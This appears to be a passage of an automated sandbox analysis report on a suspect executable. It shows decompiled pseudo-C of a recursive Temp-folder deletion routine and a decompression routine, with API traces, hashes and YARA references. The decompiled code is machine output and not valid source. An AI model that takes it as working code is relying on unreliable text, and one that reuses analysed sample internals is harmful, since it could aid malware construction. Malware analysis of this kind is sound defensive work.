                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 10001E28
                                                                                                                          • lstrcpyA.KERNEL32(00000008,?), ref: 10001E74
                                                                                                                          • lstrcpyA.KERNEL32(00000408,?), ref: 10001E7E
                                                                                                                          • GlobalFree.KERNEL32 ref: 10001E98
                                                                                                                          • GlobalFree.KERNEL32 ref: 10001F80
                                                                                                                          • GlobalFree.KERNEL32 ref: 10001F85
                                                                                                                          • GlobalFree.KERNEL32 ref: 10001F8A
                                                                                                                          • GlobalFree.KERNEL32 ref: 1000212C
                                                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 10002273
                                                                                                                          • GetModuleHandleA.KERNEL32(00000008), ref: 100022DA
                                                                                                                          • LoadLibraryA.KERNEL32(00000008), ref: 100022EB
                                                                                                                          • GetProcAddress.KERNEL32(?,00000408), ref: 1000230E
                                                                                                                          • lstrcatA.KERNEL32(00000408,10004024), ref: 10002320
                                                                                                                          • GetProcAddress.KERNEL32(?,00000408), ref: 1000232D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.335998522.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.335961527.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.336004505.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.336018222.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$lstrcpy$AddressAllocProc$HandleLibraryLoadModulelstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2432367840-0
                                                                                                                          • Opcode ID: 3818cbf0824076af76067ca21706b0dae5062f5e1d4de8adee62f854b1445e57
                                                                                                                          • Instruction ID: 98843f7ed549c9a0ea4508068d46c46912eefce37284e078a37cbced179c0dd6
                                                                                                                          • Opcode Fuzzy Hash: 3818cbf0824076af76067ca21706b0dae5062f5e1d4de8adee62f854b1445e57
                                                                                                                          • Instruction Fuzzy Hash: FF02AC71D0464ADFEB60CFA4C8807EEBBF4FB043C4F21852AE5A5A7189D7749A81CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004054BD, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E004054BD(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040576C(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423fc8 =  *0x423fc8 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405B98(0x421540, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004056D2(_t72);
					} else {
						lstrcatA(0x421540, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x421540,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004056B6( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405B98(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E00405850(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404E84(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423fc8 =  *0x423fc8 + 1;
										} else {
											E00404E84(0xfffffff1, _t72);
											E004058E6(__eflags, _t72, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004054BD(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x421540 - 0x5c;
					if( *0x421540 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405E93(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E0040568B(_t72);
							E00405850(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404E84(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404E84(0xfffffff1, _t72);
							return E004058E6(__eflags, _t72, 0);
						}
						L33:
						 *0x423fc8 =  *0x423fc8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                                                                                                          0x004054c8
                                                                                                                          0x004054cc
                                                                                                                          0x004054d5
                                                                                                                          0x004054d8
                                                                                                                          0x004054db
                                                                                                                          0x004054e3
                                                                                                                          0x004054e5
                                                                                                                          0x004054e6
                                                                                                                          0x00000000
                                                                                                                          0x004054e6
                                                                                                                          0x004054f5
                                                                                                                          0x004054f5
                                                                                                                          0x004054f8
                                                                                                                          0x004054fb
                                                                                                                          0x0040550f
                                                                                                                          0x00405516
                                                                                                                          0x0040551b
                                                                                                                          0x0040551d
                                                                                                                          0x0040552d
                                                                                                                          0x0040551f
                                                                                                                          0x00405525
                                                                                                                          0x00405525
                                                                                                                          0x00405532
                                                                                                                          0x00405535
                                                                                                                          0x00405540
                                                                                                                          0x00405546
                                                                                                                          0x0040554b
                                                                                                                          0x0040555b
                                                                                                                          0x0040555d
                                                                                                                          0x00405563
                                                                                                                          0x00405566
                                                                                                                          0x00405569
                                                                                                                          0x00405626
                                                                                                                          0x00405626
                                                                                                                          0x0040562a
                                                                                                                          0x0040562c
                                                                                                                          0x0040562c
                                                                                                                          0x0040562c
                                                                                                                          0x0040562c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040556f
                                                                                                                          0x0040556f
                                                                                                                          0x00405578
                                                                                                                          0x0040557e
                                                                                                                          0x00405583
                                                                                                                          0x00405586
                                                                                                                          0x00405588
                                                                                                                          0x0040558c
                                                                                                                          0x0040558e
                                                                                                                          0x0040558e
                                                                                                                          0x0040558c
                                                                                                                          0x00405591
                                                                                                                          0x00405594
                                                                                                                          0x004055a7
                                                                                                                          0x004055a9
                                                                                                                          0x004055ae
                                                                                                                          0x004055b5
                                                                                                                          0x004055cd
                                                                                                                          0x004055d3
                                                                                                                          0x004055d9
                                                                                                                          0x004055db
                                                                                                                          0x00405600
                                                                                                                          0x004055dd
                                                                                                                          0x004055dd
                                                                                                                          0x004055e1
                                                                                                                          0x004055f5
                                                                                                                          0x004055e3
                                                                                                                          0x004055e6
                                                                                                                          0x004055ee
                                                                                                                          0x004055ee
                                                                                                                          0x004055e1
                                                                                                                          0x004055b7
                                                                                                                          0x004055bd
                                                                                                                          0x004055bf
                                                                                                                          0x004055c5
                                                                                                                          0x004055c5
                                                                                                                          0x004055bf
                                                                                                                          0x00000000
                                                                                                                          0x004055b5
                                                                                                                          0x00405596
                                                                                                                          0x00405599
                                                                                                                          0x0040559b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040559d
                                                                                                                          0x0040559f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004055a1
                                                                                                                          0x004055a5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405605
                                                                                                                          0x0040560f
                                                                                                                          0x00405615
                                                                                                                          0x00405615
                                                                                                                          0x00405620
                                                                                                                          0x00000000
                                                                                                                          0x00405620
                                                                                                                          0x00405537
                                                                                                                          0x0040553e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004054fd
                                                                                                                          0x004054fd
                                                                                                                          0x004054ff
                                                                                                                          0x00405630
                                                                                                                          0x00405633
                                                                                                                          0x00405636
                                                                                                                          0x00405688
                                                                                                                          0x00405688
                                                                                                                          0x00405688
                                                                                                                          0x00405638
                                                                                                                          0x0040563b
                                                                                                                          0x00405646
                                                                                                                          0x0040564b
                                                                                                                          0x0040564d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405650
                                                                                                                          0x00405656
                                                                                                                          0x0040565c
                                                                                                                          0x00405662
                                                                                                                          0x00405664
                                                                                                                          0x00000000
                                                                                                                          0x00405680
                                                                                                                          0x00405666
                                                                                                                          0x0040566a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040566f
                                                                                                                          0x00000000
                                                                                                                          0x00405676
                                                                                                                          0x0040563d
                                                                                                                          0x0040563d
                                                                                                                          0x00000000
                                                                                                                          0x0040563d
                                                                                                                          0x00405505
                                                                                                                          0x00405509
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405509

                                                                                                                          APIs
                                                                                                                          • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004054DB
                                                                                                                          • lstrcatA.KERNEL32(00421540,\*.*,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405525
                                                                                                                          • lstrcatA.KERNEL32(?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405546
                                                                                                                          • lstrlenA.KERNEL32(?,?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040554C
                                                                                                                          • FindFirstFileA.KERNEL32(00421540,?,?,?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040555D
                                                                                                                          • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040560F
                                                                                                                          • FindClose.KERNEL32(?), ref: 00405620
                                                                                                                          Strings
                                                                                                                          • "C:\Users\user\Desktop\PQMW0W5h3X.exe" , xrefs: 004054BD
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004054C7
                                                                                                                          • \*.*, xrefs: 0040551F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                          • String ID: "C:\Users\user\Desktop\PQMW0W5h3X.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                          • API String ID: 2035342205-4253199528
                                                                                                                          • Opcode ID: 151e37dfdb71e49779ebe8013d58079144af5c7b104cf071a6fd2cd1a311b3c4
                                                                                                                          • Instruction ID: 6fea787f5ff7f663b03802bfccf250d7b0f6b6b9ddff8139893414afbc0e0c0d
                                                                                                                          • Opcode Fuzzy Hash: 151e37dfdb71e49779ebe8013d58079144af5c7b104cf071a6fd2cd1a311b3c4
                                                                                                                          • Instruction Fuzzy Hash: D851CE30804A447ACB216B218C49BBF3B78DF92728F54857BF809751D2E73D5982DE5E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004061D4, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E004061D4() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
